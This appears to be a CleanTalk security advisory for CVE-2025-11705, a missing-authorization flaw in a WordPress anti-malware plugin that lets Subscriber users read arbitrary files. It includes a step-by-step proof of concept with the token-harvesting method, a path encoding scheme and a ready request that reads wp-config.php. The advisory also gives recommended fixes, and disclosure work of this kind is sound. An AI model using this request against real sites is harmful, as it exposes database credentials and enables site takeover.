The Anti-Malware Security and Brute-Force Firewall plugin is installed on over 100,000 WordPress sites to detect, quarantine, and remove malicious code, as well as to prevent brute-force login attempts. Central to its functionality is a quarantine system that logs suspicious files into a private custom post type (GOTMLS_quarantine) and exposes administrative AJAX endpoints for viewing, scanning, and clearing these quarantined items. However, CVE-2025-11705 reveals a severe broken authorization chain: through the public-facing GOTMLS_View_Quarantine endpoint, any authenticated user – including a Subscriber+ – can obtain a valid GOTMLS_mt token, then reuse that token to invoke GOTMLS_scan and read arbitrary filesystem files (e.g., wp-config.php), or call GOTMLS_empty_trash to tamper with quarantine records. This combination of token leakage and missing capability checks constitutes a critical confidentiality and integrity risk.
| CVE | CVE-2025-11705 |
| Plugin Version | Anti-Malware Security and Brute-Force Firewall <= 4.23.81 |
| Critical | High |
| All Time | 7 283 946 |
| Active installations | 100 000+ |
| Publicly Published | October 28, 2025 |
| Last Updated | October 28, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11705 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gotmls/anti-malware-security-and-brute-force-firewall-42381-missing-authorization-to-authenticated-subscriber-arbitrary-file-read |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| August 3, 2025 | Plugin testing and vulnerability detection in the Anti-Malware Security and Brute-Force Firewall have been completed |
| August 3, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 28, 2025 | Registered CVE-2025-11705 |
Discovery of the Vulnerability
During security testing, researchers observed that the AJAX action GOTMLS_View_Quarantine (registered without a nonce or capability check) renders a quarantined-item list for any logged-in user. In each table row, the plugin embeds an HTML anchor linking to the GOTMLS_scan endpoint, including the freshly minted GOTMLS_mt token for that user. Because both GOTMLS_scan and GOTMLS_empty_trash accept this token—validated only by the bare GOTMLS_get_nonce() function—and do not enforce current_user_can() or check nonces, a Subscriber+ user can extract the token from the quarantine list and invoke scan or empty commands at will. Code references:
Token Generation: gotmls/images/index.php anchors include action=GOTMLS_scan&GOTMLS_mt={token}.
View Quarantine: gotmls/index.php lines ~420-433 (no auth).
Empty Trash: lines ~1615-1623 (GOTMLS_ajax_empty_trash checks only GOTMLS_get_nonce()).
Scan: lines ~1785-1863 (GOTMLS_ajax_scan decodes the path and calls file_get_contents()).
Understanding of Arbitrary File Read attack’s
WordPress security best practices require that any AJAX endpoint performing sensitive operations must implement both nonce verification and capability checks to prevent Cross-Site Request Forgery (CSRF) and enforce role-based access. In prior CVEs—such as CVE-2025-9202 in the ColorMag theme—plugins exposed nonces to low-privilege users and omitted current_user_can(), enabling unauthorized demo imports. Likewise, CVE-2025-8595 in the Zakra theme allowed Subscriber+ users to install demos. CVE-2025-11705 extends this pattern: by leaking a valid token through an unauthenticated view endpoint and then accepting it in critical handlers without verifying the user’s role, the plugin effectively grants Subscriber+ users the ability to read arbitrary server-side files and erase quarantine records, thus breaking confidentiality and integrity.
Exploiting the Arbitrary File Read Vulnerability
To exploit CVE-2025-11705, an attacker with cookie of Subscriber+:
POC:
Start by ensuring there is at least one quarantine record so that GOTMLS_View_Quarantine renders links. If your test environment doesn’t have any, you can simulate one via a single SQL insert into wp_posts using the plugin’s expected structure: post_type = 'GOTMLS_quarantine' and post_status = 'private'. For a minimal placeholder you can run, in one line, INSERT INTO wp_posts (post_author,post_date,post_date_gmt,post_content,post_title,post_excerpt,post_status,comment_status,ping_status,post_password,post_name,to_ping,pinged,post_modified,post_modified_gmt,post_content_filtered,post_parent,guid,menu_order,post_type,post_mime_type,comment_count) VALUES (1,NOW(),UTC_TIMESTAMP(),'', '/tmp/GOTMLS_POC_missing.txt','', 'private','closed','closed','', 'gotmls-quarantine-poc','', '', NOW(),UTC_TIMESTAMP(),'', 0,'GOTMLS-POC',0,'GOTMLS_quarantine','00000000000000000000000000000000',0);. This mirrors how the plugin queries quarantine Log in as a low-privileged user such as Subscriber and open https://your-site/wp-admin/admin-ajax.php?action=GOTMLS_View_Quarantine. The response will include at least one <a> element whose href points to admin-ajax.php?action=GOTMLS_scan and already contains a GOTMLS_mt=<hex> token. Copy that token value verbatim; this is a user-bound token valid for your session. Because the server checks only GOTMLS_get_nonce() with an empty context and never calls current_user_can(...), this token will be accepted by GOTMLS_scan and GOTMLS_empty_trash regardless of your role. Craft a request to read an arbitrary file. The GOTMLS_scan parameter expects the plugin’s custom base64-like encoding of the path: take the absolute path, base64-encode it, strip the trailing = padding, replace + with - and / with _, then append a single digit indicating the number of = you stripped plus one (so two = becomes 3). For a stock Debian/Apache path /var/www/html/wordpress/wp-config.php the correct encoded value is L3Zhci93d3cvaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocA3. With your token from the previous step, request: GET /wordpress/wp-admin/admin-ajax.php?action=GOTMLS_scan&GOTMLS_mt=<TOKEN_FROM_VIEW_QUARANTINE>&GOTMLS_scan=L3Zhci93d3cvaHRtbC93b3JkcHJlc3Mvd3AtY29uZmlnLnBocA3. The response iframe HTML will contain the contents of wp-config.php.____
The ability to read wp-config.php or other sensitive files exposes database credentials, secret keys, and API tokens, enabling full site takeover via out-of-band database access or remote code execution. On multi-author or membership sites, any subscriber could quietly exfiltrate secrets. Deleting quarantine logs also removes forensic evidence of malware detection, allowing attackers to persist undetected. In enterprise or eCommerce environments, such a breach can lead to data theft, financial fraud, and regulatory non-compliance, compounding legal and reputational damages.
Recommendations for Improved Security
Enforce Capability Checks: Wrap GOTMLS_ajax_scan, GOTMLS_ajax_empty_trash, and GOTMLS_View_Quarantine in current_user_can('manage_options') to restrict to administrators.
Strengthen Nonce Handling: Use check_ajax_referer() with distinct nonces for each action and never expose tokens via public view endpoints.
Separate View and Action Tokens: Generate action-specific nonces per user session and ensure they cannot be reused across contexts.
Audit AJAX Routes: Review all add_action('wp_ajax_*') handlers in the plugin, applying both nonce and capability checks.
Log and Alert: Record each scan and empty-trash event with user ID and timestamp, sending immediate alerts for unauthorized attempts.
By taking proactive measures to address Arbitrary File Read vulnerabilities like CVE-2025–11705 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #ArbitaryFileRead/LFI #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.